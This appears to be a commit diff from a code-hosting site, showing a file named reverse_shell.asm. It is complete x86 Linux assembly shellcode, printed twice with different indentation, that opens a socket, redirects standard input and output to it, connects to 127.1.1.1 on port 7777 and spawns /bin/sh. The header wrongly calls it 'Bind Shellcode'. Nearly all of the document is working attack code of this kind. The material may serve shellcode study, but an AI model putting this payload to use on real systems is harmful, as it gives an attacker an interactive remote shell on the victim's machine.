AdityaChaudhary · January 7, 2019 19:10
diff --git a/reverse_shell.asm b/reverse_shell.asm
 ; Bind Shellcode
 ; Author: Aditya Chaudhary
 ; Date: 7th Jan 2019

 global _start
 section .text

 _start:

  ; int conn_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  ; eax = 0x66 ; sys_socketcall
  ; ebx = 0x1 ; SYS_SOCKET function
  ; ecx = reference to (AF_INET, SOCK_STREAM, IPPROTO_TCP) = (2, 1, 0)

  xor eax, eax ; eax = 0

  push eax ; push 0
  inc eax ; eax = 1
  mov ebx, eax ; ebx = 1
  push ebx ; push 1
  push byte 0x2 ; push 2

  mov ecx, esp ; ecx = reference to (2, 1, 0)

  mov al, 0x66 ; sys_socketcall
  int 0x80

  mov esi, eax ; save conn_sock in esi

  ; dup2(conn_sock,0);
  ; eax = 63 = 0x3f
  ; ebx = conn_sock = esi
  ; ecx = 2, 1, 0


  mov ebx, esi ; ebx = conn_sock
  pop ecx ; ecx = 2 ;loop counter
 dup2:
  mov al, 0x3f ; systemcall dup2
  int 0x80
  dec ecx
  jns dup2

  ; connect(conn_sock, (struct sockaddr *) &serv_addr, 16);
  ; struct sockaddr_in srv_addr;
  ; srv_addr.sin_family = AF_INET; = 2
  ; srv_addr.sin_port = htons( 7777 ); = 0x1e61
  ; srv_addr.sin_addr.s_addr = htonl (127.1.1.1); = 0x7f010101
  ; eax = 0x66 ; sys_socketcall
  ; ebx = 3 ; SYS_CONNECT function
  ; ecx = reference to (conn_sock, (struct sockaddr *) &serv_addr, 16)

  push 0x0101017f ; byte reverse of 0x7f010101 (127.1.1.1)
  push word 0x611e ; byte reverse of 0x1e61 (7777)
  push word 0x2 ; AF_INET
  mov ecx, esp ; ecx = reference(AF_INET, 7777, 127.1.1.1)

  push 0x10 ; push 16 -> sizeof(serv_addr)
  push ecx ; push reference to (AF_INET, 7777, 127.1.1.1)
  push esi ; push conn_sock

  mov ecx, esp

  mov bl, 0x3 ; SYS_CONNECT function
  mov al, 0x66 ; sys_socketcall
  int 0x80


  ; execve("/bin/sh", NULL, NULL);
  ; eax = 11 = 0xb ; systemcall execve
  ; ebx = "/bin/sh" = "//bin/sh" = 0x2f2f62696e2f7368
  ; ecx = 0
  ; edx = 0

  xor ecx, ecx ; ecx = NULL
  mov edx, ecx ; edx = NULL

  push ecx ; push NULL
  push 0x68732f6e ; push n/sh in reverse
  push 0x69622f2f ; push //bi in reverse
  mov ebx, esp  ; ebx now points to //bin/sh

  mov al, 0xb ; systemcall execve
  int 0x80
	; Bind Shellcode
	; Author: Aditya Chaudhary
	; Date: 7th Jan 2019

	global _start
	section .text

	_start:

	; int conn_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	; eax = 0x66 ; sys_socketcall
	; ebx = 0x1 ; SYS_SOCKET function
	; ecx = reference to (AF_INET, SOCK_STREAM, IPPROTO_TCP) = (2, 1, 0)

	xor eax, eax ; eax = 0

	push eax ; push 0
	inc eax ; eax = 1
	mov ebx, eax ; ebx = 1
	push ebx ; push 1
	push byte 0x2 ; push 2

	mov ecx, esp ; ecx = reference to (2, 1, 0)

	mov al, 0x66 ; sys_socketcall
	int 0x80

	mov esi, eax ; save conn_sock in esi

	; dup2(conn_sock,0);
	; eax = 63 = 0x3f
	; ebx = conn_sock = esi
	; ecx = 2, 1, 0


	mov ebx, esi ; ebx = conn_sock
	pop ecx ; ecx = 2 ;loop counter
	dup2:
	mov al, 0x3f ; systemcall dup2
	int 0x80
	dec ecx
	jns dup2

	; connect(conn_sock, (struct sockaddr *) &serv_addr, 16);
	; struct sockaddr_in srv_addr;
	; srv_addr.sin_family = AF_INET; = 2
	; srv_addr.sin_port = htons( 7777 ); = 0x1e61
	; srv_addr.sin_addr.s_addr = htonl (127.1.1.1); = 0x7f010101
	; eax = 0x66 ; sys_socketcall
	; ebx = 3 ; SYS_CONNECT function
	; ecx = reference to (conn_sock, (struct sockaddr *) &serv_addr, 16)

	push 0x0101017f ; byte reverse of 0x7f010101 (127.1.1.1)
	push word 0x611e ; byte reverse of 0x1e61 (7777)
	push word 0x2 ; AF_INET
	mov ecx, esp ; ecx = reference(AF_INET, 7777, 127.1.1.1)

	push 0x10 ; push 16 -> sizeof(serv_addr)
	push ecx ; push reference to (AF_INET, 7777, 127.1.1.1)
	push esi ; push conn_sock

	mov ecx, esp

	mov bl, 0x3 ; SYS_CONNECT function
	mov al, 0x66 ; sys_socketcall
	int 0x80


	; execve("/bin/sh", NULL, NULL);
	; eax = 11 = 0xb ; systemcall execve
	; ebx = "/bin/sh" = "//bin/sh" = 0x2f2f62696e2f7368
	; ecx = 0
	; edx = 0

	xor ecx, ecx ; ecx = NULL
	mov edx, ecx ; edx = NULL

	push ecx ; push NULL
	push 0x68732f6e ; push n/sh in reverse
	push 0x69622f2f ; push //bi in reverse
	mov ebx, esp ; ebx now points to //bin/sh

	mov al, 0xb ; systemcall execve
	int 0x80
No results found